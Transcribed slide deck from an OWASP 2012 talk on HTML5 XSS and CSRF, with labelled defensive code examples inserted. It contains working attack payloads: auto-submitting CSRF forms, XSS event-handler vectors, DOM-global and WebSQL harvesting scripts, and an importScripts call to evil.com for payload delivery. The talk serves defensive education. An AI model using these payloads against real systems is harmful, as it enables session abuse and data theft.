XSS and CSRF with HTML5
- 1. XSS & CSRF with HTML5
Attack, Exploit and Defense
Shreeraj Shah
Blueinfy Solutions Pvt. Ltd.
shreeraj.shah@blueinfy.net
OWASP
OWASP AppSecUSA 2012
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
- 2. Who Am I?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
Twitter @shreeraj
Founder & Director
Blueinfy & iAppSecure Solutions Pvt. Ltd.
Past experience
Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev)
Interest
Web security research
Published research
Articles / Papers – Securityfocus, O’Reilly, DevX, InformIT etc.
Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
Advisories – .Net, Java servers etc.
Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
Books (Author)
Web 2.0 Security – Defending Ajax, RIA and SOA
Hacking Web Services
Web Hacking
- 4. HTML5 – Attacks on the rise …
Evolution of HTML5
1991 – HTML started (plain and simple)
1996 – CSS & JavaScript (welcome to the world of XSS and browser security)
2000 – XHTML1 (growing concerns and attacks on browsers)
2005 – AJAX, XHR, DOM (attack cocktail and surface expansion)
2009 – HTML5 (here we go… new surface, architecture and defense) – HTML+CSS+JS
- 5. Modern Browser Model
[Diagram: layered browser model. Presentation – HTML5 + CSS, Silverlight, Flash, Mobile API (Media, Geo etc.) & Messaging, Plug-In. Process & Logic – JavaScript, DOM/Events, Parser/Threads. Browser Native Network Services (Network & Access) – WebSQL, Cache, Storage, FileSystem, XHR 1 & 2, WebSocket, Plug-in Sockets. Core Policies – SOP/CORS/Content-Sec, Sandbox.]
- 6. HTML5 Architecture & Threat Model
[Diagram: HTML5 architecture and threat model. The User Interface (HTML/CSS, JavaScript, DOM/Page) runs as a Single DOM application inside the browser Sandbox (Origin – Policy); it reaches a Cross Domain Application and the Target Application over the Internet through XHR and WebSockets. Native APIs: Storage, WebSQL, IndexedDB, FileSystem, Cache; Messaging APIs; Geolocation and other APIs.]
- 8. CSRF Attack Vector
[Diagram: CSRF attack with a live session. The client/victim's browser logs in to the application server (Login → Success – cookie set), then visits the attacker's page; the attacker's site sends a CSRF payload, the browser replays the request with its cookie to the application server and the action succeeds (Success). Components: Client/Victim Browser, Attacker's Site, Authentication Server, Application Server, Web Store Database.]
Successful exploitation …
• SOP bypass
• Cookie Replay
- 9. SOP bypass and Cookie Replay – Basic Type
GET Request
IMG SRC
<img src="http://host/?command">
SCRIPT SRC
<script src="http://host/?command"></script>
IFRAME SRC
<iframe src="http://host/?command"></iframe>
POST Request (the page carries a form named foo that is submitted automatically)
<form name="foo" action="http://host/" method="POST"></form>
<script type="text/javascript" language="JavaScript">
document.foo.submit();
</script>
- 11. CSRF injection – splitting and forcing …
<html>
<body>
<form name="buy" enctype="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" method="POST">
<input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
</form>
<script>document.buy.submit();</script>
</body>
</html>
- 12. CSRF with XHR and CORS bypass
- 13. XHR – Level 2 powering CSRF
The XHR object in HTML5 (XMLHttpRequest Level 2) is very powerful
It allows interesting features such as cross-origin requests and binary upload/download
xhr.responseType can be set to "text", "arraybuffer", "document" and "blob"
For posting data, the body can be a DOMString, Document, FormData, Blob, File, ArrayBuffer etc.
- 14. CORS & XHR – ingredients for CSRF
Before HTML5 – cross-domain requests were not possible through XHR (SOP applied)
HTML5 – allows cross-origin calls with XHR Level 2
CORS – Cross Origin Resource Sharing must be followed (OPTIONS/preflight calls)
The server opts in by adding extra HTTP headers (Access-Control-Allow-Origin and a few others)
- 15. CORS based HTTP Headers
Request
Origin
Access-Control-Request-Method (preflight)
Access-Control-Request-Headers (preflight)
Response
Access-Control-Allow-Origin
Access-Control-Allow-Credentials
Access-Control-Expose-Headers
Access-Control-Max-Age (preflight)
Access-Control-Allow-Methods (preflight)
Access-Control-Allow-Headers (preflight)
- 16. XHR – Stealth POST/GET
CSRF – powered by CORS and XHR
Hence a stealth channel, and possibly silent exploitation
One-way CSRF with any stream, since XHR allows a raw stream from the browser (XML, JSON and binary as well)
Two-way CSRF (POST and read the response) when the allow origin is set to *
- 17. Exploiting the use case
CORS preflight bypass – certain Content-Type values bypass the preflight HTTP request
Forcing cookie replay with "withCredentials"
Internal network scanning and tunneling
Information harvesting (internal crawling)
Stealth browser shell – post XSS (Allow-Origin: *)
Business functionality abuse (upload and binary streams)
- 18. CSRF with XHR/HTML5
[Diagram: user establishing a session. The client/victim's browser sends a login request (HTTPS) to the authentication server and receives a session cookie. Components: Client/Victim Browser, Authentication Server, Application Server, Web Store Database.]
- 19. CSRF with XHR/HTML5
[Diagram: browser using an XHR call. JavaScript in the user's browser makes a buy over HTTP, placing an order through JSON services; the application server answers Success. Components: Client/Victim Browser, Authentication Server, Application Server, Web Store Database.]
- 20. CSRF with XHR/HTML5
[Diagram: the user visits the attacker's page while the session is still live (not yet logged out); the attacker's site sends a CSRF payload to the browser. Components: Client/Victim Browser, Attacker's Site, Authentication Server, Application Server, Web Store Database.]
Leveraging XHR Call
• Content-type to avoid preflight
• "withCredentials" set to true
- 22. CSRF with XHR/HTML5
[Diagram: the attacker's CSRF payload running in the victim's browser makes XHR initiate the HTTP buy request to the application server; Success – cookie replayed. Components: Client/Victim Browser, Attacker's Site, Authentication Server, Application Server, Web Store Database.]
Hence,
• Without victim's consent or notice – got it
• Stealth HTTP request generated
• Silent exploitation takes place
- 24. CSRF with XHR/HTML5
[Diagram: the browser holds a multi-part form for the business-layer upload function; uploading bulk orders to the application server returns Success. Components: Client/Victim Browser, Authentication Server, Application Server, Web Store Database.]
- 26. CSRF with XHR/HTML5
[Diagram: the attacker's CSRF payload makes XHR initiate an HTTP multi-part upload to the application server; Success – cookie replayed. Components: Client/Victim Browser, Attacker's Site, Authentication Server, Application Server, Web Store Database.]
Hence,
• Without victim's consent or notice – got it
• Stealth HTTP upload takes place
• Silent exploitation…
- 28. Internal Scan – not scan but crawl as well …
[Diagram: the attacker's site on the Internet delivers a CSRF payload and a stealth channel to the client/victim's browser; from inside the intranet the browser reaches the Internal Web Mail, the Internal HR Application and the Internal Web/App Server.]
- 30. Scan and Defend
Scan and look for
Content-Type checking on the server side
CORS policy scan
Forms and uploads with or without tokens
Defense and Countermeasures
Secure libraries for streaming HTML5/Web 2.0 content
CSRF protections
Stronger CORS implementation
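Added example (not from the deck or its author): the server-side checks listed above, as plain JavaScript functions a request handler would call. The request objects, origins and session token are constructed stand-ins; the safelisted Content-Type list is the browser's CORS rule for skipping a preflight.

```javascript
// Content types a cross-origin XHR may send WITHOUT an OPTIONS preflight (CORS-safelisted).
const PREFLIGHT_FREE_TYPES = ['text/plain', 'application/x-www-form-urlencoded', 'multipart/form-data'];
const SIMPLE_METHODS = ['GET', 'HEAD', 'POST'];

function mimeOf(contentType) {
  return (contentType || '').split(';')[0].trim().toLowerCase();
}

// Mirrors the browser's decision: no preflight when method and Content-Type are safelisted.
// This is the "Content-type to avoid pre flight" condition the attack slides rely on.
function requiresPreflight(method, contentType) {
  if (!SIMPLE_METHODS.includes(method.toUpperCase())) return true;
  if (contentType === undefined) return false;
  return !PREFLIGHT_FREE_TYPES.includes(mimeOf(contentType));
}

// Server-side rule for a JSON API: a forged text/plain body that happens to contain JSON
// or XML must be rejected before it reaches the business logic.
function enforceJsonContentType(req) {
  return mimeOf(req.headers['content-type']) === 'application/json';
}

// CORS response headers from an explicit allow-list. The matched origin is echoed, never
// '*', and unknown origins get no CORS headers at all (the browser then blocks the read).
function corsHeaders(origin, allowList) {
  if (!allowList.includes(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers': 'Content-Type, X-CSRF-Token',
    'Vary': 'Origin',
  };
}

// Decision for a state-changing request: Origin (when present) must be allow-listed, the
// body must be JSON, and a per-session token must be repeated in a custom header (a custom
// header forces a preflight, so a cross-origin page cannot add it without CORS approval).
function authorizeStateChange(req, allowList, sessionToken) {
  const origin = req.headers['origin'];
  if (origin !== undefined && !allowList.includes(origin)) return 'reject: origin';
  if (!enforceJsonContentType(req)) return 'reject: content-type';
  if (req.headers['x-csrf-token'] !== sessionToken) return 'reject: csrf-token';
  return 'allow';
}
```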
- 32. XSS with HTML5 (tags, attributes and events)
- 33. HTML5 – Tags/Attributes/Events
Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form controls (keys)
Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
Events/Objects – Navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
- 35. XSS variants
Exploiting autofocus
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
- 36. XSS variants
Form & Button etc.
<form id="test" /><button form="test" formaction="javascript:alert(1)">test
<form><button formaction="javascript:alert(1)">test
Etc … and more …
Nice HTML5 XSS cheat sheet (http://html5sec.org/)
- 37. Scan and Defend
Scan and look for
Reflected or persistent XSS spots with HTML5 tags
Defense and Countermeasures
Add the HTML5 tags, attributes and events to your blacklist
Standard XSS protections by encoding
- 38. CSP in Action – HTML5 defense …
Content Security Policy – defending the browser against possible post-attack scenarios
Based on origin (SOP is the key)
Allows a whitelisting mechanism for what "to do" and "not to do"
It is possible to send a notification back to the application when a violation takes place
Implemented by extra HTTP headers, which differ from browser to browser: X-WebKit-CSP (Safari/Chrome), X-Content-Security-Policy (Firefox)
- 40. Controlling Browser
connect-src – controlling WebSocket, XHR etc.
frame-src – source of frames (ClickJacking)
object-src – Flash, Silverlight etc.
media-src – controlling audio and video
img-src/style-src – image and style sources
default-src https:; – locking everything to SSL only
- 41. Example
Response for a page with persistent XSS injected – the X-WebKit-CSP header restricts scripts to the page's own origin
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2012 14:40:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-WebKit-CSP: script-src 'self'
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6146
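Added example (not from the deck): a minimal evaluator for the CSP source syntax used on slides 40 and 41, to reason about what a header such as X-WebKit-CSP: script-src 'self' blocks. The page origin and the URLs tested are constructed; ports, nonces and hashes are not handled.

```javascript
// Parse "directive src src; directive src" into a map of directive -> list of sources.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Does one source expression match a resource URL for a page served from docOrigin?
function sourceMatches(src, url, docOrigin) {
  const target = new URL(url);
  if (src === "'none'") return false;
  if (src === '*') return true;
  if (src === "'self'") return target.origin === docOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return target.protocol === src.toLowerCase(); // scheme source
  // host source: [scheme://]host[/path]; the host may start with a *. wildcard label
  const [scheme, rest] = src.includes('://') ? src.split('://') : [null, src];
  const host = rest.split('/')[0].toLowerCase();
  if (scheme !== null && target.protocol !== scheme.toLowerCase() + ':') return false;
  if (host.startsWith('*.')) return target.hostname.endsWith(host.slice(1));
  return target.hostname === host;
}

// Is loading `url` under `directive` allowed? A missing directive falls back to
// default-src; if neither is present the load is unrestricted. url === null means an
// inline script/style, which only 'unsafe-inline' permits.
function cspAllows(policy, directive, url, docOrigin) {
  const sources = policy[directive] || policy['default-src'];
  if (sources === undefined) return true;
  if (url === null) return sources.includes("'unsafe-inline'");
  return sources.some(src => sourceMatches(src, url, docOrigin));
}

// The deck's example header, evaluated against a constructed page origin: own script
// allowed, injected remote script and injected inline script both blocked.
const EXAMPLE_POLICY = parseCsp("script-src 'self'");
function exampleBlocksInjectedScript() {
  const page = 'https://shop.example';
  return cspAllows(EXAMPLE_POLICY, 'script-src', page + '/app.js', page) &&
         !cspAllows(EXAMPLE_POLICY, 'script-src', 'https://other.example/x.js', page) &&
         !cspAllows(EXAMPLE_POLICY, 'script-src', null, page);
}
```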
- 42. Storage extraction with XSS
- 43. Web Storage Extraction
Before HTML5 the browser had one place to store data – the cookie (limited in size and replayed on every request)
HTML5 – Storage API provided (Local and Session)
Can hold globally scoped variables
http://www.w3.org/TR/webstorage/
- 44. Web Storage Extraction
It is possible to steal them through XSS or via JavaScript
Session hijacking – HttpOnly is of no use here
getItem and setItem calls
XSS the box and scan through storage
- 46. File System Storage
HTML5 provides a virtual file system with filesystem APIs
window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
It becomes a full-blown local file system for the application, inside the sandbox
It empowers the application
- 47. File System Storage
It provides a temporary or permanent file system
var filesys;                         // handle kept for later file operations
function catcherror(e) {             // error callback (e.g. quota or security error)
  console.log('FileSystem error:', e);
}
function init() {
  window.requestFileSystem(window.TEMPORARY, 1024*1024,
    function(filesystem) {
      filesys = filesystem;
    }, catcherror);
}
The app can have a full filesystem in place now.
- 50. Single DOM/One Page App - XSS
Applications run with a "rich" DOM
JavaScript sets several variables and parameters while loading – GLOBALS
They hold sensitive information; what if they are GLOBAL and remain for the life of the application?
They can be retrieved with XSS
HTTP requests and responses go through JavaScript (XHR) – what about those vars?
- 51. Blind Enumeration
for (var i in window) {
  var obj = window[i];
  try {
    if (typeof obj == "string") {
      console.log(i);                // name of the global
      console.log(obj.toString());   // its string value
    }
  } catch (ex) {}
}
- 52. Global Sensitive Information Extraction from DOM
HTML5 apps running on a single DOM
Having several key global variables, objects and arrays
var arrayGlobals = ['my@email.com', "12141hewvsdr9321343423mjfdvint", "test.com"];
Post-DOM-based exploitation is possible, harvesting all these values.
- 53. Global Sensitive Information Extraction from DOM
for (var i in window) {
  var obj = window[i];
  if (obj != null) {                      // skips both null and undefined
    var type = typeof obj;
    if (type == "object" || type == "string") {
      console.log("Name:" + i);
      try {
        var my = JSON.stringify(obj);     // throws on cyclic objects such as window itself
        console.log(my);
      } catch (ex) {}
    }
  }
}
- 54. Scan and Defend
Scan and look for
Scanning storage
Defense and Countermeasures
Do not store sensitive information in localStorage or in globals
XSS protection
- 55. SQLi & Blind Enumeration through XSS
- 56. SQL Injection
WebSQL is part of the HTML5 specification; it provides a SQL database inside the browser itself.
Allows one-time data loading and offline browsing capabilities.
Causes security concerns and creates potential injection points.
Methods and calls are possible from JavaScript
- 58. Blind WebSQL Enumeration
var dbo;
var table;
var usertable;
for (var i in window) {
  var obj = window[i];
  try {
    if (obj.constructor.name == "Database") {
      dbo = obj;
      obj.transaction(function(tx) {
        tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'",
          [], function(tx, results) {
            table = results;
            // the result set arrives asynchronously, so it is read inside the callback
            if (table.rows.length > 1)
              usertable = table.rows.item(1).name;
          }, null);
      });
    }
  } catch (ex) {}
}
- 59. Blind WebSQL Enumeration
We run through all objects and pick the one whose constructor is "Database"
We make a SELECT query directly against the sqlite_master table
We grab the 1st table, leaving the WebKit table at the 0th entry
- 61. Web Messaging and Worker Injection
- 62. Web Messaging
HTML5 has a new inter-frame communication system called Web Messaging.
With the postMessage() call the parent frame/domain can communicate with the iframe
The iframe can be loaded from a cross domain. Hence it creates issues – data/information validation, and data leakage by cross-posting becomes possible
worker.webkitPostMessage – faster transferable objects
- 63. Web Messaging - Scenario
If postMessage() is called with target origin * then the page can be loaded in an iframe and the messaging can be hijacked
Also, if the origin of incoming messages is not checked against a fixed value, the frame listens to any domain – again an issue
The incoming stream needs to be checked before it reaches innerHTML or eval()
An iframe or Web Worker can glue two streams – same domain or cross domain
- 65. Web Worker – Hacks!
Web Workers allow threading in HTML pages using JavaScript
No need to emulate concurrency with JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest and event handlers
Totally async and well supported
[initialize] var worker = new Worker('task.js');
[Messaging] worker.postMessage();
- 66. Web Worker – Hacks!
[Diagram: a Web Worker runs as a background thread on the same page as the web page's current DOM, with its own scope and objects (XHR, Location, Navigator, Regex, Array, JSON etc.) in the browser's JavaScript runtime platform; it has no DOM access and talks to the page only by messaging.]
- 67. Web Worker – Hacks!
Security issues
It does not allow loading cross-domain worker scripts (http:, https:, javascript:, data: – no)
It has some typical issues
It allows the use of XHR. Hence in-domain and CORS requests are possible
It can cause DoS – if the user gets a stream that runs JavaScript in the worker thread. It does not have access to the parent DOM though
Message validation needed – else DOM-based XSS
- 68. Web Worker – Hacks!
Example
<html>
<button onclick="Read()">Read Last Message</button>
<button onclick="stop()">Stop</button>
<output id="result"></output>
<script>
var worker = new Worker('message.js');
function Read() {
  worker.postMessage({'cmd': 'read', 'msg': 'last'});
}
function stop() {
  worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
  alert("Worker stopped");
}
// worker output is written straight into the page as HTML – this is the DOM XSS sink
worker.addEventListener('message', function(e) {
  document.getElementById('result').innerHTML = e.data;
}, false);
</script>
</html>
- 69. Web Workers – Hacks!
Possible to cause XSS
Running script
Passing hidden payload
Also, web workers can help in embedding a silently running js file that can be controlled.
Can be a tool for payload delivery and control within the browser framework
importScripts("http://evil.com/payload.js") – the worker can run a cross-domain script
- 70. Scan and Defend
Scan and look for
JavaScript scanning
Messaging and Worker implementation
DOM calls
Use of eval(), document.* calls etc.
Defense and Countermeasures
Same-origin checking is a must for the messaging event listener
Secure JavaScript coding
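Added example (not from the deck): a message listener that applies the checks listed above before a postMessage or Worker message reaches the page, covering the scenario on slide 63 and the innerHTML sink in slide 68's page. The MessageEvent objects, the trusted origin and the {cmd, msg} shape are constructed stand-ins.

```javascript
const ALLOWED_ORIGINS = ['https://app.example'];   // assumed trusted frame origin
const ALLOWED_CMDS = ['read', 'stop'];              // the two commands slide 68's page sends

// Validate a MessageEvent before it does anything. Returns a result object rather than
// touching the DOM, so the same logic can be unit-tested outside a browser.
// fromWorker: Worker messages carry an empty origin, so the origin check does not apply;
// the script URL passed to new Worker() must then be same-origin and fixed.
function validateMessage(event, allowedOrigins = ALLOWED_ORIGINS, fromWorker = false) {
  // 1. Origin check: a listener without this accepts messages from a frame on any domain.
  if (!fromWorker && !allowedOrigins.includes(event.origin)) return { ok: false, reason: 'origin' };
  // 2. Shape check: only a plain {cmd, msg} object, never a bare string bound for eval/innerHTML.
  const d = event.data;
  if (d === null || typeof d !== 'object' || typeof d.cmd !== 'string' || typeof d.msg !== 'string') {
    return { ok: false, reason: 'shape' };
  }
  // 3. Command allow-list and a length bound on the free-text field.
  if (!ALLOWED_CMDS.includes(d.cmd)) return { ok: false, reason: 'cmd' };
  if (d.msg.length > 256) return { ok: false, reason: 'length' };
  return { ok: true, cmd: d.cmd, msg: d.msg };
}

// Write the message as text. In a page outputEl is document.getElementById('result');
// textContent creates a text node, so any markup in msg is displayed, not parsed.
function renderMessage(result, outputEl) {
  if (!result.ok) return false;
  outputEl.textContent = result.msg;
  return true;
}

// Wiring as it would appear in the page (guarded so the file also loads under Node).
if (typeof window !== 'undefined') {
  window.addEventListener('message', function (e) {
    renderMessage(validateMessage(e), document.getElementById('result'));
  }, false);
}
```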
- 71. APIs …
A few other HTML5 APIs are interesting from a security standpoint
File APIs – allow local file access and can be mixed with ClickJacking and other attacks to gain client files.
Drag-Drop APIs – exploiting self XSS and a few other tricks, hijacking cookies …
Lots more to explore and defend…
- 73. Conclusion and Questions
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com